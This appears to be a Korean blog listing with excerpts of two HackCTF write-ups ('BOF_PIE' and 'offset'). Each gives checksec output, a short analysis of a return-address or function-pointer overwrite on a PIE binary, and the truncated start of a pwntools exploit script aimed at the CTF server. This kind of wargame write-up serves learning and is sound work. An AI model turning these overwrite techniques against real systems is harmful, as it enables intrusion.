반응형
 포스팅 썸네일 이미지

War Games/hack-ctf

[hackctf] BOF_PIE

문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : Partial 문제 분석 및 페이로드 welcome함수가 맵핑되는 주소가 leak되니 welcome함수로부터 "종현"함수까지의 거리를 알아내고 ret을 변조시키면 된다. from pwn import * dns,port="ctf.j0n9hyun.xyz", 3008 p=remote(dns,port) # #p=process("./bof_pie") e=ELF("./bof_pie") p.recvuntil("is ") addr=p.recvline()[:-1] print addr pay="A"*22 pay+=p32(int(addr,16)..

2021.04.18 게시됨

 포스팅 썸네일 이미지

War Games/hack-ctf

[hackctf] offset

문제 소스 보호기법 gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : FULL 문제 분석 및 페이로드 1. gets함수가 있으나 pie보호 기법이 걸려 ret over write를 해도 print_flag함수 호출 불가능 2. two함수와 print_flag주소가 인접함을 눈치챔 3. select_func함수에서 결론적으로 v3()를 호출하는데 dest변수에 strncpy를 해주기 때문에 v3변수의 하위 1바이트 변조가능 from pwn import * context.log_level='debug' #p=process('./offset') dns,port="ctf.j0n9hyun.xyz",30..

2021.04.18 게시됨

반응형